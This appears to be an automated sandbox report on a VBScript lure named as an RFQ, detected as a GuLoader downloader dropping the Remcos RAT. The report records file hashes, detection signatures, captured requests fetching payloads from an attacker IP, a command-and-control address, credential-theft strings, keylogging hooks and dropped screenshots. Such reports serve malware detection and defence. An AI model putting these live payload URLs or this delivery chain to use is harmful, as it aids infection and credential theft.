Windows Analysis Report
RFQ.NO. S70-23Q-1474-CS-P.vbs

Overview

General Information

Sample name: RFQ.NO. S70-23Q-1474-CS-P.vbs
Analysis ID: 1428130
MD5: e93e1296b7e4688e847b299faed3bef2
SHA1: b3a6d46e8b062e47efd38e88d85d10125cff102d
SHA256: 78a74e42bcf0d0df7cb482f178307235d60fbf59754456c2f742c4510dc83697
Tags: RFQvbs
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://geoplugin.net/json.gp URL Reputation: Label: phishing
Source: Yara match File source: 00000013.00000003.1861984710.000000002511C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Binary string: m.Core.pdb source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1856821763.0000000008866000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 4e089\System.Core.pdb-)9 source: powershell.exe, 0000000F.00000002.1857571369.00000000088DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbG source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0040AE51 FindFirstFileW,FindNextFileW, 26_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 27_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 28_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WCN\en-GB\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\ Jump to behavior

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic TCP traffic: 192.168.2.7:49711 -> 146.70.57.34:2286
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View IP Address: 146.70.57.34 146.70.57.34
Source: global traffic HTTP traffic detected: GET /Fodgngerovergangs.prm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /JTcKQkcYvvHPBH210.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: global traffic HTTP traffic detected: GET /Fodgngerovergangs.prm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /JTcKQkcYvvHPBH210.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: wab.exe, 0000001A.00000003.1934746117.0000000003439000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginSP equals www.facebook.com (Facebook)
Source: wab.exe, 0000001A.00000003.1934746117.0000000003439000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginSP equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe, wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: paygateme.net
Source: powershell.exe, 0000000B.00000002.2085378720.000001C45C038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2085378720.000001C45D6CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.184
Source: powershell.exe, 0000000B.00000002.2085378720.000001C45C038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.184/Fodgngerovergangs.prmP
Source: powershell.exe, 0000000F.00000002.1847892742.0000000004F1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.184/Fodgngerovergangs.prmXR
Source: powershell.exe, 0000000B.00000002.2085378720.000001C45D6CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.H
Source: wab.exe, 00000013.00000003.1880111826.0000000008779000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.1874089529.000000000877C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 0000000B.00000002.2227118758.000001C46BE7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.1847892742.0000000004F1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.2085378720.000001C45BE11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1847892742.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1847892742.0000000004F1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: wab.exe, wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000001C.00000002.1917436309.0000000002DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 0000001C.00000002.1917436309.0000000002DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comppData
Source: wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 0000001A.00000002.1935559415.0000000002E34000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 0000000B.00000002.2085378720.000001C45BE11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000F.00000002.1847892742.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.1847892742.0000000004F1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000B.00000002.2085378720.000001C45D044000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: wab.exe, 0000001A.00000003.1922074468.0000000004C01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000001A.00000003.1922470776.0000000004C05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: wab.exe, 0000001A.00000003.1922074468.0000000004C01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000001A.00000003.1922470776.0000000004C05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: wab.exe, 0000001A.00000003.1934746117.0000000003439000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000001A.00000003.1922074468.0000000004C01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000001A.00000003.1922470776.0000000004C05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 0000000B.00000002.2227118758.000001C46BE7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe, wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 26_2_0041183A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 26_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 26_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 27_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 27_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 28_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 28_2_004072B5

E-Banking Fraud

barindex
Source: Yara match File source: 00000013.00000003.1861984710.000000002511C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201135.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181320.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201235.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181420.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201336.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181520.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201436.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201536.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201636.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181621.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201736.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181721.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201836.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181821.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201938.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181922.dat entropy: 7.99902079555 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202038.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182023.dat entropy: 7.99902079555 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202138.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182123.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202238.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182223.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202339.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182323.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202439.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182423.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202539.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182523.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202639.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182623.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202739.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182723.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202841.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182823.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202941.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182923.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203041.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183023.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165008.dat entropy: 7.99867593907 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165108.dat entropy: 7.99867593907 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165208.dat entropy: 7.99860501643 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165309.dat entropy: 7.99867593907 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165410.dat entropy: 7.99867593907 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203141.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183123.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203242.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183224.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203342.dat entropy: 7.99901409683 Jump to dropped file
